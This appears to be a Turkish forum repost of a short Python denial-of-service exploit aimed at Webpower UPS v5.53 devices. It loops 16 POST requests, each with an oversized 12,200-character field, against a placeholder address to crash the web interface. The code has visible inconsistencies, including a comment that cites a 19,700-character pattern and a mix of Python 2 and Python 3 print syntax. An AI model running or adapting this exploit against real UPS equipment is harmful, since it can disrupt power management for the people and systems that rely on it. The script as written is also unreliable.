Hoşgeldin Misafir

Webpower UPS 5.53 Denial Of Service Exploit

greenbone

4 Eyl 2022
2,020 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
# Exploit Title: Webpower UPS v5.53 HTTP Denial of Service
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.eaton.com/ae/en-gb.html
# Software Link: https://www.eaton.com/ae/en-gb.html
# Version: Revision v5.53
# Tested on: WebPower UPS
# CVE: N/A
#!/usr/bin/env python
# Webpower UPS v5.53 HTTP Denial of Service.
# Discovered BY (Yehia Elghaly)
import requests
 
url = 'IP_Address'
data = {'Long_string' : 'a' * 12200}# 19700-character pattern
 
for i in range (16):
  response = requests.post(url, data=data)
  print("Response {}: {}".format(i+1, response.status_code))
  print "crach"
 
#  0day.today [2023-03-24]  #